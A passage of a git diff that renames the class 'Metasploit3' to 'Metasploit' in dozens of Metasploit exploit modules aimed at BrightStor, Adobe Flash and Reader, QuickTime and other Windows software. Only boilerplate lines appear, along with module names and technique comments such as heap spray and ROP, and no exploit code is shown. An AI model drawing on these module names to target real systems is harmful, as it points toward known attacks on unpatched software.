a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index d439f85cc8..33c609cce3 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 6f6bda88cd..26e60ee999 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index a54686a117..a4578a7d45 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index bbbd6376ee..e3e63efb15 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index e12c6efa64..aaf92631c8 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index 53b03d3d27..02a5936701 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 6ea0c62537..ed10d335f4 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index af04cc4bf8..ee111d6f9e 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb index f4ca613159..ab057c309f 100644 --- a/modules/exploits/windows/brightstor/message_engine_72.rb +++ b/modules/exploits/windows/brightstor/message_engine_72.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 5ba4ca46fb..596cbd842e 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 2785745edc..3253ac7c58 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index dc9da31f15..4a943562c3 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb index 6e55ba95b3..dade3b80cb 100644 --- a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb +++ b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index 770d7c8fa9..56c6653ed3 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 2f18a7668a..ebcc259078 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb index 2194a15c1e..90eb880d27 100644 --- a/modules/exploits/windows/browser/adobe_flash_avm2.rb +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb index 57bc88f9aa..b281f6e695 100644 --- a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb +++ b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index 34dcd36cb9..6be4950219 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb index 5b1fdf05f8..28fbcca760 100644 --- a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index ac3e425873..6f52d4e504 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 692e2be2fa..2fc8845fdd 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index e1f1d0072b..7184c2377c 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb index f000571844..9950b96db5 100644 --- a/modules/exploits/windows/browser/adobe_flash_pcre.rb +++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000' diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb index 7cd4e5d44e..07c6b82945 100644 --- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index 89e33338e5..22d0d2a462 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 8acbbb573a..32e363686e 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index b4fa07267a..c4b1a8d4d8 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb index 5575afab8c..f57c5c7b8d 100644 --- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index b1af657d89..b2e932709f 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb index 2fd3934e19..f15f80ebbb 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index 3a7dcbd1c1..aac5a21551 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index d512e180d4..bf887c4c38 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index bfcdff41d3..5f1882d1b6 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index cf67c75243..156b8a3faa 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 92bece600b..68bb3ad128 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index ab1bbc2970..7853b61cfb 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 6d3843fb63..88cc480ed0 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb index 388c30fe6b..fd8ba6ca9c 100644 --- a/modules/exploits/windows/browser/adobe_toolbutton.rb +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 392d49790e..42b7c9d74c 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb index 1598534a4b..f9e59c880c 100644 --- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb +++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index cd7abc4965..cd2bb32bde 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index 8ed7b765ad..2af752e032 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 0ed7599111..f7def26813 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 618ceede6d..281365032c 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb index 6426521138..6835a56277 100644 --- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb +++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index 38e8c16c39..5169f604ef 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 8907f6869c..38c2a11aaa 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb index 69d6b8a164..fac8e3beef 100644 --- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb +++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 0a2cdaa1ed..aaac0aed53 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index 2355aab342..db868afe9f 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # needs more testing/targets to be Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb index 6d58e6d12d..78eee4832c 100644 --- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb +++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index f73ec53adf..5a0e9fb6d0 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb index 1bd56b231c..c1e66bd060 100644 --- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb +++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 695e939113..176aae2ca5 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 523b471db6..f0c41d3cfe 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index a8e80a26fa..d3112a607d 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # heap spray and address shifty include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 770403a7c7..3dfa37101c 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -23,7 +23,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index d0be485f04..1f3803d162 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index 271caa3851..83c14d6a2c 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index bf6181bd25..36ebd1a1e8 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb 